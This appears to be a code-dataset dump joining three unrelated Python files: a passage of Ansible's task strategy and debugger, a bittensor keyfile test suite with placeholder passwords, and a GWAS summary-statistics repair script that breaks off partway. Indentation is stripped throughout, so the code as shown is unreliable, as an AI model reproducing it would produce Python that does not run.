elif meta_action == 'clear_host_errors':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
self._tqm._failed_hosts.pop(host.name, False)
self._tqm._unreachable_hosts.pop(host.name, False)
iterator._host_states[host.name].fail_state = iterator.FAILED_NONE
msg = "cleared host errors"
else:
skipped = True
elif meta_action == 'end_play':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
if host.name not in self._tqm._unreachable_hosts:
iterator._host_states[host.name].run_state = iterator.ITERATING_COMPLETE
msg = "ending play"
elif meta_action == 'reset_connection':
all_vars = self._variable_manager.get_vars(play=iterator._play, host=target_host, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
# apply the given task's information to the connection info,
# which may override some fields already set by the play or
# the options specified on the command line
play_context = play_context.set_task_and_variable_override(task=task, variables=all_vars, templar=templar)
# fields set from the play/task may be based on variables, so we have to
# do the same kind of post validation step on it here before we use it.
play_context.post_validate(templar=templar)
# now that the play context is finalized, if the remote_addr is not set
# default to using the host's address field as the remote address
if not play_context.remote_addr:
play_context.remote_addr = target_host.address
# We also add "magic" variables back into the variables dict to make sure
# a certain subset of variables exist.
play_context.update_vars(all_vars)
if task.when:
self._cond_not_supported_warn(meta_action)
if target_host in self._active_connections:
connection = Connection(self._active_connections[target_host])
del self._active_connections[target_host]
else:
connection = connection_loader.get(play_context.connection, play_context, os.devnull)
play_context.set_options_from_plugin(connection)
if connection:
try:
connection.reset()
msg = 'reset connection'
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
else:
msg = 'no connection, nothing to reset'
else:
raise AnsibleError("invalid meta action requested: %s" % meta_action, obj=task._ds)
result = {'msg': msg}
if skipped:
result['skipped'] = True
else:
result['changed'] = False
display.vv("META: %s" % msg)
return [TaskResult(target_host, task, result)]
def get_hosts_left(self, iterator):
''' returns list of available hosts for this iterator by filtering out unreachables '''
hosts_left = []
for host in self._inventory.get_hosts(iterator._play.hosts, order=iterator._play.order):
if host.name not in self._tqm._unreachable_hosts:
hosts_left.append(host)
return hosts_left
def update_active_connections(self, results):
''' updates the current active persistent connections '''
for r in results:
if 'args' in r._task_fields:
socket_path = r._task_fields['args'].get('_ansible_socket')
if socket_path:
if r._host not in self._active_connections:
self._active_connections[r._host] = socket_path
class NextAction(object):
""" The next action after an interpreter's exit. """
REDO = 1
CONTINUE = 2
EXIT = 3
def __init__(self, result=EXIT):
self.result = result
class Debugger(cmd.Cmd):
prompt_continuous = '> ' # multiple lines
def __init__(self, task, host, task_vars, play_context, result, next_action):
# cmd.Cmd is old-style class
cmd.Cmd.__init__(self)
self.prompt = '[%s] %s (debug)> ' % (host, task)
self.intro = None
self.scope = {}
self.scope['task'] = task
self.scope['task_vars'] = task_vars
self.scope['host'] = host
self.scope['play_context'] = play_context
self.scope['result'] = result
self.next_action = next_action
def cmdloop(self):
try:
cmd.Cmd.cmdloop(self)
except KeyboardInterrupt:
pass
do_h = cmd.Cmd.do_help
def do_EOF(self, args):
"""Quit"""
return self.do_quit(args)
def do_quit(self, args):
"""Quit"""
display.display('User interrupted execution')
self.next_action.result = NextAction.EXIT
return True
do_q = do_quit
def do_continue(self, args):
"""Continue to next result"""
self.next_action.result = NextAction.CONTINUE
return True
do_c = do_continue
def do_redo(self, args):
"""Schedule task for re-execution. The re-execution may not be the next result"""
self.next_action.result = NextAction.REDO
return True
do_r = do_redo
def evaluate(self, args):
try:
return eval(args, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def do_pprint(self, args):
"""Pretty Print"""
try:
result = self.evaluate(args)
display.display(pprint.pformat(result))
except Exception:
pass
do_p = do_pprint
def execute(self, args):
try:
code = compile(args + '\n', '<stdin>', 'single')
exec(code, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def default(self, line):
try:
self.execute(line)
except Exception:
pass
| 45.483037 | 156 | 0.590662 |
4a1e39eb24df3b0b9023e350d44c980fb3d1fc3e | 6,455 | py | Python | tests/integration_tests/test_keyfile.py | AltaverseDAO/bittensor | ce0e6887d7e2b279b168949d4e7730981db8de6f | [
"MIT"
] | null | null | null | tests/integration_tests/test_keyfile.py | AltaverseDAO/bittensor | ce0e6887d7e2b279b168949d4e7730981db8de6f | [
"MIT"
] | null | null | null | tests/integration_tests/test_keyfile.py | AltaverseDAO/bittensor | ce0e6887d7e2b279b168949d4e7730981db8de6f | [
"MIT"
] | null | null | null | # The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import bittensor
from unittest.mock import MagicMock
import os
import shutil
import unittest.mock as mock
import pytest
# Init dirs.
if os.path.exists('/tmp/pytest'):
shutil.rmtree('/tmp/pytest')
def test_create():
keyfile = bittensor.keyfile (path = '/tmp/pytest/keyfile' )
mnemonic = bittensor.Keypair.generate_mnemonic( 12 )
alice = bittensor.Keypair.create_from_mnemonic(mnemonic)
keyfile.set_keypair(alice, encrypt=True, overwrite=True, password = 'thisisafakepassword')
assert keyfile.is_readable()
assert keyfile.is_writable()
assert keyfile.is_encrypted()
keyfile.decrypt( password = 'thisisafakepassword' )
assert not keyfile.is_encrypted()
keyfile.encrypt( password = 'thisisafakepassword' )
assert keyfile.is_encrypted()
str(keyfile)
keyfile.decrypt( password = 'thisisafakepassword' )
assert not keyfile.is_encrypted()
str(keyfile)
assert keyfile.get_keypair( password = 'thisisafakepassword' ).ss58_address == alice.ss58_address
assert keyfile.get_keypair( password = 'thisisafakepassword' ).private_key == alice.private_key
assert keyfile.get_keypair( password = 'thisisafakepassword' ).public_key == alice.public_key
bob = bittensor.Keypair.create_from_uri ('/Bob')
keyfile.set_keypair(bob, encrypt=True, overwrite=True, password = 'thisisafakepassword')
assert keyfile.get_keypair( password = 'thisisafakepassword' ).ss58_address == bob.ss58_address
assert keyfile.get_keypair( password = 'thisisafakepassword' ).public_key == bob.public_key
repr(keyfile)
def test_legacy_coldkey():
keyfile = bittensor.keyfile (path = '/tmp/pytest/coldlegacy_keyfile' )
keyfile.make_dirs()
keyfile_data = b'0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f'
with open('/tmp/pytest/coldlegacy_keyfile', "wb") as keyfile_obj:
keyfile_obj.write( keyfile_data )
assert keyfile.keyfile_data == keyfile_data
keyfile.encrypt( password = 'this is the fake password' )
keyfile.decrypt( password = 'this is the fake password' )
keypair_bytes = b'{"accountId": "0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f", "publicKey": "0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f", "secretPhrase": null, "secretSeed": null, "ss58Address": "5DD26kC2kxajmwfbbZmVmxhrY9VeeyR1Gpzy9i8wxLUg6zxm"}'
assert keyfile.keyfile_data == keypair_bytes
assert keyfile.get_keypair().ss58_address == "5DD26kC2kxajmwfbbZmVmxhrY9VeeyR1Gpzy9i8wxLUg6zxm"
assert keyfile.get_keypair().public_key == "0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f"
def test_validate_password():
from bittensor._keyfile.keyfile_impl import validate_password
assert validate_password(None) == False
assert validate_password('passw0rd') == False
assert validate_password('123456789') == False
with mock.patch('getpass.getpass',return_value='biTTensor'):
assert validate_password('biTTensor') == True
with mock.patch('getpass.getpass',return_value='biTTenso'):
assert validate_password('biTTensor') == False
def test_decrypt_keyfile_data_legacy():
import base64
from bittensor._keyfile.keyfile_impl import decrypt_keyfile_data
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.backends import default_backend
__SALT = b"Iguesscyborgslikemyselfhaveatendencytobeparanoidaboutourorigins"
def __generate_key(password):
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), salt=__SALT, length=32, iterations=10000000, backend=default_backend())
key = base64.urlsafe_b64encode(kdf.derive(password.encode()))
return key
pw = 'fakepasssword238947239'
data = b'encrypt me!'
key = __generate_key(pw)
cipher_suite = Fernet(key)
encrypted_data = cipher_suite.encrypt(data)
decrypted_data = decrypt_keyfile_data( encrypted_data, pw)
assert decrypted_data == data
def test_user_interface():
from bittensor._keyfile.keyfile_impl import ask_password_to_encrypt
with mock.patch('getpass.getpass', side_effect = ['pass', 'password', 'asdury3294y', 'asdury3294y']):
assert ask_password_to_encrypt() == 'asdury3294y'
def test_overwriting():
from bittensor._keyfile.keyfile_impl import KeyFileError
keyfile = bittensor.keyfile (path = '/tmp/pytest/keyfile' )
alice = bittensor.Keypair.create_from_uri ('/Alice')
keyfile.set_keypair(alice, encrypt=True, overwrite=True, password = 'thisisafakepassword')
bob = bittensor.Keypair.create_from_uri ('/Bob')
with pytest.raises(KeyFileError) as pytest_wrapped_e:
with mock.patch('builtins.input', return_value = 'n'):
keyfile.set_keypair(bob, encrypt=True, overwrite=False, password = 'thisisafakepassword')
def test_keyfile_mock():
file = bittensor.keyfile( _mock = True )
assert file.exists_on_device()
assert not file.is_encrypted()
assert file.is_readable()
assert file.data
assert file.keypair
file.set_keypair( keypair = bittensor.Keypair.create_from_mnemonic( mnemonic = bittensor.Keypair.generate_mnemonic() ))
def test_keyfile_mock_func():
file = bittensor.keyfile.mock()
| 47.814815 | 298 | 0.757242 |
4a1e3a8041bc9d758c1e79b2e21d6938c4decc6f | 24,167 | py | Python | lib/loop_fix.py | Titorat/SSrehab | 6691ee1ed442073bfa00a51f0d9ab74b9252d302 | [
"MIT"
] | null | null | null | lib/loop_fix.py | Titorat/SSrehab | 6691ee1ed442073bfa00a51f0d9ab74b9252d302 | [
"MIT"
] | null | null | null | lib/loop_fix.py | Titorat/SSrehab | 6691ee1ed442073bfa00a51f0d9ab74b9252d302 | [
"MIT"
] | null | null | null | # standard library
import io
import sys
import re
from typing import Dict, Literal
import os
import time
from math import isnan
import gzip
# third-party libraries
from liftover import ChainFile as get_lifter_from_ChainFile # type: ignore # pylance mistakenly doesn't recognize ChainFile
# local
from math_utils import normal_p_area_two_tailed, normal_z_score_two_tailed
from standard_column_order import STANDARD_COLUMN_ORDER
from validate_utils import read_report_from_dir
from env import GWASSS_BUILD_NUMBER_ENV, get_build, set_build
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# INPUT #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
if len(sys.argv) < 8: # the very first 0th arg is the name of this script
print("ERROR: you should specify args:")
print(" #1 GWAS summary statistics file in the internal \"standard\" tsv format")
print(" #2 directory with the report about the GWAS summary statistics file")
print(" #3 OUTPUT: filename for GWAS summary statistics with fixes")
print(" #4 preprocessed dbSNP1 file, or \"None\"")
print(" #5 preprocessed dbSNP2 file, or \"None\"")
print(" #6 chain file for liftover from build 36 or 37 to build 38, or \"None\"")
print(" #7 frequency database slug (e.g.: \"GnomAD\", \"dbGaP_PopFreq\", \"TOMMO\"), or \"None\"")
print(" #8 (optional) Either \"rsID\" or \"ChrBP\". Denotes the sorting of the input GWAS SS file")
exit(1)
# GWAS_FILE has to be in the internal "standard" tsv format
GWAS_FILE = sys.argv[1]
REPORT_DIR = sys.argv[2]
OUTPUT_GWAS_FILE = sys.argv[3]
SNPs_FILE = sys.argv[4]
SNPs_rsID_FILE = sys.argv[5]
CHAIN_FILE = sys.argv[6]
FREQ_DATABASE_SLUG = sys.argv[7].lower() if sys.argv[7] != 'None' else None
GWAS_SORTING: Literal[None, 'rsID', 'ChrBP'] = None
if len(sys.argv) > 8:
GWAS_SORTING = sys.argv[8] if sys.argv[8] in ('rsID', 'ChrBP') else None # type: ignore # pylance doesn't collapse types properly atm
def file_exists(path: str):
return os.path.isfile(path)
if not file_exists(GWAS_FILE):
print(f"ERROR: provided gwas file doesn't exist: {GWAS_FILE}")
exit(1)
GWAS_FILE_o = open(GWAS_FILE, 'r')
OUTPUT_GWAS_FILE_o = open(OUTPUT_GWAS_FILE, 'w')
line_i=0
cols_i: Dict[str, int] = {STANDARD_COLUMN_ORDER[i]:i for i in range(len(STANDARD_COLUMN_ORDER))}
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# CONSTANTS #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
NUCLEOTIDES = ['a', 't', 'c', 'g']
NO_NUCLEOTIDE = '.'
ALLOW_MULTI_NUCLEOTIDE_POLYMORPHISMS = True
CATEGORY_CHR = [
'1', '01', '2', '02', '3', '03', '4', '04', '5', '05', '6', '06', '7', '07', '8', '08', '9', '09',
'10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20',
'21', '22', '23', 'X', 'x', 'Y', 'y', 'M', 'm']
class kukdefaultdict(dict):
def __missing__(self, key):
return key
CHR_ORDER = kukdefaultdict() # if unknown key was passed, returns the key itself
CHR_ORDER['1'] = 1
CHR_ORDER['01'] = 1 #
CHR_ORDER['2'] = 2
CHR_ORDER['02'] = 2 #
CHR_ORDER['3'] = 3
CHR_ORDER['03'] = 3 #
CHR_ORDER['4'] = 4
CHR_ORDER['04'] = 4 #
CHR_ORDER['5'] = 5
CHR_ORDER['05'] = 5 #
CHR_ORDER['6'] = 6
CHR_ORDER['06'] = 6 #
CHR_ORDER['7'] = 7
CHR_ORDER['07'] = 7 #
CHR_ORDER['8'] = 8
CHR_ORDER['08'] = 8 #
CHR_ORDER['9'] = 9
CHR_ORDER['09'] = 9 #
CHR_ORDER['10'] = 10
CHR_ORDER['11'] = 11
CHR_ORDER['12'] = 12
CHR_ORDER['13'] = 13
CHR_ORDER['14'] = 14
CHR_ORDER['15'] = 15
CHR_ORDER['16'] = 16
CHR_ORDER['17'] = 17
CHR_ORDER['18'] = 18
CHR_ORDER['19'] = 19
CHR_ORDER['20'] = 20
CHR_ORDER['21'] = 21
CHR_ORDER['22'] = 22
CHR_ORDER['23'] = 23
CHR_ORDER['X'] = 25
CHR_ORDER['x'] = 25
CHR_ORDER['Y'] = 26
CHR_ORDER['y'] = 26
CHR_ORDER['M'] = 27
CHR_ORDER['m'] = 27
CHR_LIFTOVER = kukdefaultdict()
CHR_LIFTOVER['1'] = '1'
CHR_LIFTOVER['01'] = '1' #
CHR_LIFTOVER['2'] = '2'
CHR_LIFTOVER['02'] = '2' #
CHR_LIFTOVER['3'] = '3'
CHR_LIFTOVER['03'] = '3' #
CHR_LIFTOVER['4'] = '4'
CHR_LIFTOVER['04'] = '4' #
CHR_LIFTOVER['5'] = '5'
CHR_LIFTOVER['05'] = '5' #
CHR_LIFTOVER['6'] = '6'
CHR_LIFTOVER['06'] = '6' #
CHR_LIFTOVER['7'] = '7'
CHR_LIFTOVER['07'] = '7' #
CHR_LIFTOVER['8'] = '8'
CHR_LIFTOVER['08'] = '8' #
CHR_LIFTOVER['9'] = '9'
CHR_LIFTOVER['09'] = '9' #
CHR_LIFTOVER['10'] = '10'
CHR_LIFTOVER['11'] = '11'
CHR_LIFTOVER['12'] = '12'
CHR_LIFTOVER['13'] = '13'
CHR_LIFTOVER['14'] = '14'
CHR_LIFTOVER['15'] = '15'
CHR_LIFTOVER['16'] = '16'
CHR_LIFTOVER['17'] = '17'
CHR_LIFTOVER['18'] = '18'
CHR_LIFTOVER['19'] = '19'
CHR_LIFTOVER['20'] = '20'
CHR_LIFTOVER['21'] = '21'
CHR_LIFTOVER['22'] = '22'
CHR_LIFTOVER['23'] = '23'
CHR_LIFTOVER['X'] = 'X'
CHR_LIFTOVER['x'] = 'X'
CHR_LIFTOVER['Y'] = 'Y'
CHR_LIFTOVER['y'] = 'Y'
CHR_LIFTOVER['M'] = 'M'
CHR_LIFTOVER['m'] = 'M'
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# FUNCTIONS #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
def copy_line(line_i):
OUTPUT_GWAS_FILE_o.write(GWAS_FILE_o.readline())
return line_i + 1
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# FUNCTIONS THAT RUN MANY TIMES #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
##### read/write #####
def get_next_line_in_GWASSS():
line = GWAS_FILE_o.readline()
if line == '': raise EOFError('attempt to read beyond the end of GWAS SS file')
return line.split("\t")
def write_line_to_GWASSS(fields):
OUTPUT_GWAS_FILE_o.write("\t".join(fields))
def read_dbSNP1_data_row(FILE_o: io.TextIOWrapper):
"""Reads a row from the preprocessed dbSNP file 1"""
line = FILE_o.readline()
words = line.split()
return (
words[0], # Chr
int(words[1]), # BP
words[2], # rsID
words[3], # REF
words[4], # ALT
words[5], # freq
)
def read_dbSNP2_data_row(FILE_o: io.TextIOWrapper):
"""Reads a row from the preprocessed dbSNP file 2 (which is sorted by rsID)"""
line = FILE_o.readline()
words = line.split()
return (
words[1], # Chr
words[2], # BP
words[0], # rsID
words[3], # REF
words[4], # ALT
words[5], # freq
)
def gt(val1, val2):
"""
A safe "greater than" operator. Accepts int and str for both args.
It has the following 3 important features:
- if both values are numbers (like chromosome order number), it compares numerically
- if both values are strings (like unrecognized chromosome numbers), compares alphabetically
- if the second value is string (like unrecognized chromosome number), and
the first value is number (like chromosome order number),
then it assumes the number is always no bigger than the string.
This is because (here) "unrecognized" chromosome numbers in dbSNP always go after
the common chromosome numbers (known in the CHR_ORDER dictionary).
With the assumption that the case where the first value is string
and the second value is number doesn't occur,
this order relation defines a *totally ordered set* which is mathematically defined as:
1. First go chromosome numbers defined as keys in CHR_ORDER dictionary,
starting with '1' = '01', ordered by the corresponding values in the dictionary.
2. After that goes the set of all other strings
(the complement set of strings to the set of known chromosome numbers)
in the ascending alphabetical order
This matches the way GWAS SS is sorted by Chr and BP here.
"""
try:
return val1 > val2
except:
return False
##### Math & Stats functions #####
"""
These functions resolve each of the three values (p-value, beta, standard error) from the other two
s = b/z,
where:
s - standard error,
b - beta-value,
z - the normal z-score that corresponds to the p-value
e.g. for the two-tailed test (which is used in GWAS):
z = qnorm(1 - p/2),
where:
qnorm - inverse cumulative function for normal distribution
"""
def get_StdErr_from_beta_pval(beta, p):
z = normal_z_score_two_tailed(p)
return abs(beta)/z if z != 0 else 'nan'
def get_beta_from_StdErr_pval(se, p):
z = normal_z_score_two_tailed(p)
return se*z
def get_pval_from_beta_StdErr(beta, se):
z = abs(beta)/se if se != 0 else 'nan'
return normal_p_area_two_tailed(z)
##### Field validators #####
"""
These boolean functions:
accept the list of fields read from a line;
return a boolean value answering whether or not a particular field in a row is valid or not
"""
def is_valid_rsID(fields):
try:
rsid = fields[cols_i["rsID"]]
if not re.match("^rs\d+$", rsid):
return False
except:
return False
return True
def is_valid_Chr(fields):
try:
chr = fields[cols_i["Chr"]]
if chr not in CATEGORY_CHR:
return False
except:
return False
return True
def is_valid_BP(fields):
try:
bp = int(float(fields[cols_i["BP"]])) # using float allows sci notation string
if bp < 0:
return False
except:
return False
return True
def is_valid_EA_allowMNP(fields):
try:
ea = fields[cols_i["EA"]]
if ea == '':
return False
if ea == NO_NUCLEOTIDE:
return True
for char in ea.lower():
if char not in NUCLEOTIDES:
return False
except:
return False
return True
def is_valid_OA_allowMNP(fields):
try:
oa = fields[cols_i["OA"]]
if oa == '':
return False
if oa == NO_NUCLEOTIDE:
return True
for char in oa.lower():
if char not in NUCLEOTIDES:
return False
except:
return False
return True
def is_valid_EA_dontallowMNP(fields):
try:
ea = fields[cols_i["EA"]]
if ea == '':
return False
if ea == NO_NUCLEOTIDE:
return True
if ea.lower() not in NUCLEOTIDES:
return False
except:
return False
return True
def is_valid_OA_dontallowMNP(fields):
try:
oa = fields[cols_i["OA"]]
if oa == '':
return False
if oa == NO_NUCLEOTIDE:
return True
if oa.lower() not in NUCLEOTIDES:
return False
except:
return False
return True
is_valid_EA = None
is_valid_OA = None
if ALLOW_MULTI_NUCLEOTIDE_POLYMORPHISMS:
is_valid_EA = is_valid_EA_allowMNP
is_valid_OA = is_valid_OA_allowMNP
else:
is_valid_EA = is_valid_EA_dontallowMNP
is_valid_OA = is_valid_OA_dontallowMNP
def is_valid_EAF(fields):
try:
af = float(fields[cols_i["EAF"]])
if not (0 <= af <= 1):
return False
except:
return False
return True
def is_valid_SE(fields):
try:
se = float(fields[cols_i["SE"]])
if isnan(se):
return False
except:
return False
return True
def is_valid_beta(fields):
try:
beta = float(fields[cols_i["beta"]])
if isnan(beta):
return False
except:
return False
return True
def is_valid_pval(fields):
try:
pval = float(fields[cols_i["pval"]])
if isnan(pval) or not (0 <= pval <= 1):
return False
except:
return False
return True
##### RESOLVERS helpers #####
"""
These void functions accept the list of fields read from a line and may mutate it
`fields`: list[str]
list of entries in a row
"""
def resolve_allele(fields, REF, ALT):
"""
Runs iff exactly one allele entry is missing.
Depending on the REF and ALT (from the dbSNP), decides which one is the allele that's present,
and restores the other one in accord.
"""
if is_valid_EA(fields) and not is_valid_OA(fields):
MA = 'OA' # missing allele
PA = 'EA' # present allele
elif is_valid_OA(fields) and not is_valid_EA(fields):
MA = 'EA' # missing allele
PA = 'OA' # present allele
else:
return
PA_val = fields[cols_i[PA]]
if PA_val == REF:
fields[cols_i[MA]] = ALT.split(',')[0]
return
for a in ALT.split(','):
if PA_val == a:
fields[cols_i[MA]] = REF
return
def resolve_EAF(fields, REF, ALT, SNP_freq_field):
"""
1. Tries to find the allele by exact match in REF or ALT;
2. Checks if frequency entry from the given database slug is present;
3. Takes the allele frequency for the corresponding allele
"""
"""
example value for `SNP_freq_field`:
"freq=1000Genomes:0.9988,.,0.001198|GnomAD:0.9943,0.005747,."
This describes allele frequencies for 3 alleles,
from 2 databases: 1000Genomes, GnomAD
Having 3 alleles, means an allele in REF field and two alleles in ALT separated with comma.
For this example, REF and ALT values are the following:
"TA"
"T,TAA"
and `FREQ_DATABASE_SLUG`:
"GnomAD"
"""
if not is_valid_EAF(fields) and is_valid_EA(fields):
try:
freqs = SNP_freq_field.replace('freq=','').replace('|',':').split(':') # ["1000Genomes", "0.9988,.,0.001198", "GnomAD", "0.9943,0.005747,."]
freqs = [f.lower() for f in freqs] # ["1000genomes", "0.9988,.,0.001198", "gnomad", "0.9943,0.005747,."]
alleles = (REF+','+ALT).split(',') # ["TA", "T", "TAA"]
EA = fields[cols_i['EA']] # "T"
the_freq_db_i = freqs.index(FREQ_DATABASE_SLUG) # "2"
SNP_freqs = freqs[the_freq_db_i+1].split(',') # ["0.9943", "0.005747", "."]
allele_i = alleles.index(EA) # 1
fields[cols_i['EAF']] = SNP_freqs[allele_i] # "0.005747"
except:
fields[cols_i['EAF']] = '.'
##### RESOLVERS #####
"""
These void functions accept the list of fields read from a line and may mutate it
`fields`: list[str]
list of entries in a row
"""
def resolve_build38(fields, converter):
"""
Will use the input converter dictionary to liftover
from the build specified by the user to build38 (with 'chr' prefix)
"""
if is_valid_Chr(fields) and is_valid_BP(fields):
chr_gwas = CHR_LIFTOVER[fields[cols_i['Chr']]]
bp_gwas = int(float(fields[cols_i['BP']])) # using float allows sci notation string
try:
new_chr, new_bp, _ = converter[chr_gwas][bp_gwas][0]
fields[cols_i["Chr"]] = new_chr.replace('chr', '')
fields[cols_i["BP"]] = str(new_bp)
# if it can't liftover
except:
fields[cols_i["Chr"]] = '.'
fields[cols_i["BP"]] = '.'
def resolve_rsID(fields, SNPs_FILE_o):
"""
Loops through the SNPs file entries until it finds the current SNP in GWAS SS file
Current SNP is defined by Chr and BP from the passed `fields`, which is one row of GWAS SS
Therefore, rsID is restored by Chr and BP, which won't always work for biallelic sites
Assumes given GWAS SS file is sorted by Chr and BP, in the same way SNPs file is.
`SNPs_FILE_o`
opened SNPs file object
"""
if is_valid_Chr(fields) and is_valid_BP(fields) and not all([
is_valid_rsID(fields),
is_valid_OA(fields), is_valid_EA(fields),
is_valid_EAF(fields),
]):
try:
chr_gwas = fields[cols_i['Chr']]
bp_gwas = int(float(fields[cols_i['BP']]))
while True:
chr_snps, bp_snps, rsid, ref, alt, freq = read_dbSNP1_data_row(SNPs_FILE_o)
# SNPs_FILE_line_i += 1
if CHR_ORDER[chr_gwas] == CHR_ORDER[chr_snps]:
if bp_snps < bp_gwas:
continue
elif bp_gwas == bp_snps:
fields[cols_i['rsID']] = rsid
resolve_allele(fields, ref, alt)
resolve_EAF(fields, ref, alt, freq)
break # after this a new line of GWAS SS should be read and index incremented
else: #bp_snps > bp_gwas:
if not is_valid_rsID(fields):
fields[cols_i['rsID']] = '.'
break # after this a new line of GWAS SS should be read and index incremented
elif gt(CHR_ORDER[chr_snps], CHR_ORDER[chr_gwas]):
if not is_valid_rsID(fields):
fields[cols_i['rsID']] = '.'
break # after this a new line of GWAS SS should be read and index incremented
except Exception as e:
if isinstance(e, IndexError) or isinstance(e, EOFError):
# it reached the end of an either file
pass
else:
# print(f'An error occured on line {SNPs_FILE_line_i} of the SNPs file (see below)')
print(f'An error occured while looping through the SNPs file (see below)')
raise e
def resolve_ChrBP(fields, SNPs_rsID_FILE_o):
"""
Loops through the SNPs file entries until it finds the current locus
Current locus is defined by rsID from the passed `fields`, which is one row of GWAS SS
Assumes given GWAS SS file is sorted by rsID, in the same way this processed SNPs file is.
`SNPs_rsID_FILE_o`
opened SNPs file object
"""
if is_valid_rsID(fields) and not all([
is_valid_Chr(fields), is_valid_BP(fields),
is_valid_OA(fields), is_valid_EA(fields),
is_valid_EAF(fields),
]):
try:
rsID_gwas = fields[cols_i['rsID']]
while True:
chr_snps, bp_snps, rsid, ref, alt, freq = read_dbSNP2_data_row(SNPs_rsID_FILE_o)
# SNPs_FILE_line_i += 1
if rsid < rsID_gwas:
continue
elif rsID_gwas == rsid:
fields[cols_i['Chr']] = chr_snps
fields[cols_i['BP']] = bp_snps
resolve_allele(fields, ref, alt)
resolve_EAF(fields, ref, alt, freq)
break # after this a new line of GWAS SS should be read and index incremented
else: #rsid > bp_gwas:
if not is_valid_Chr(fields) or not is_valid_BP(fields):
fields[cols_i['Chr']] = '.'
fields[cols_i['BP']] = '.'
break # after this a new line of GWAS SS should be read and index incremented
except Exception as e:
if isinstance(e, IndexError) or isinstance(e, EOFError):
# it reached the end of an either file
pass
else:
# print(f'An error occured on line {SNPs_FILE_line_i} of the SNPs file (see below)')
print(f'An error occured while looping through the SNPs file (see below)')
raise e
def resolve_SE(fields):
if not is_valid_SE(fields) and is_valid_beta(fields) and is_valid_pval(fields):
fields[cols_i["SE"]] = str(get_StdErr_from_beta_pval(
float(fields[cols_i["beta"]]), float(fields[cols_i["pval"]])
))
def resolve_beta(fields):
if not is_valid_beta(fields) and is_valid_SE(fields) and is_valid_pval(fields):
fields[cols_i["beta"]] = str(get_beta_from_StdErr_pval(
float(fields[cols_i["SE"]]), float(fields[cols_i["pval"]])
))
def resolve_pval(fields):
if not is_valid_pval(fields) and is_valid_beta(fields) and is_valid_SE(fields):
fields[cols_i["pval"]] = str(get_pval_from_beta_StdErr(
float(fields[cols_i["beta"]]), float(fields[cols_i["SE"]])
))
##### FULL RESOLVER #####
"""
This function will be called for each row of the input GWAS SS file
It calls resolvers one by one from the list of resolvers.
Each resolver attempts to resolve one or many values for the given row.
Each resolver has `fields: list[str]` as the first argument,
and may have other args defined as a list under the corresponding index in `resolvers_args` list
"""
resolvers = [] # list of functions
resolvers_args = [] # list of lists of arguments for these functions
def run_all(resolvers, fields, args):
for res_i in range(len(resolvers)):
resolvers[res_i](fields, *args[res_i])
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# MAIN #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
MAIN_start_time = STEP1_start_time = time.time()
#
# STEP #1
# Assemble the full resolver function in accord to present issues.
#
# E.g.:
# - if all values from a pacticular column are valid,
# there's no need to add a resolver function for it.
# - if all values from a particular column are invalid,
# there's no need to add a resolver for another column that depends on the first,
# as it would always run uselessly
#
#
issues, total_entries = read_report_from_dir(REPORT_DIR)
DOING_LIFTOVER: bool = False
current_build = get_build()
converter = None
if current_build != 'hg38' and file_exists(CHAIN_FILE):
DOING_LIFTOVER = True
if DOING_LIFTOVER:
converter = get_lifter_from_ChainFile(CHAIN_FILE, current_build, 'hg38')
set_build('hg38')
resolvers.append(resolve_build38)
resolvers_args.append([converter])
if not DOING_LIFTOVER and GWAS_SORTING == 'rsID' and (issues['Chr'] or issues['BP'] or issues['OA'] or issues['EA'] or issues['EAF']) and file_exists(SNPs_rsID_FILE):
"""
This ChrBP resolver assumes GWAS SS file is sorted by rsID
"""
# open files here
SNPs_rsID_FILE_o_gz: io.RawIOBase = gzip.open(SNPs_rsID_FILE, 'r') # type: ignore # GzipFile and RawIOBase _are_ in fact compatible
